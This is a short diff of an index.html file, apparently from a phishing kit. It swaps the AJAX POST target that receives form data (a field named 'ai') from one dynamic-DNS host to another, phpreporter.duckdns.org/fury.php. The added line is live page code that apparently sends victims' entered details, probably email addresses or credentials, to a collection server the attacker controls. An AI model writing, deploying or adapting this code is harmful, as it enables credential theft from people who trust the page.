--- a/index.html
+++ b/index.html
@@ -180,7 +180,8 @@ $(document).ready(function() {
 
         $.ajax({
             dataType: 'JSON',
-            url:'https://twotwofive.cloudns.ph/fury.php',
+            //url:'https://twotwofive.cloudns.ph/fury.php',
+            url: 'http://phpreporter.duckdns.org/fury.php',
             type: 'POST',
             data: {
                 ai: ai,
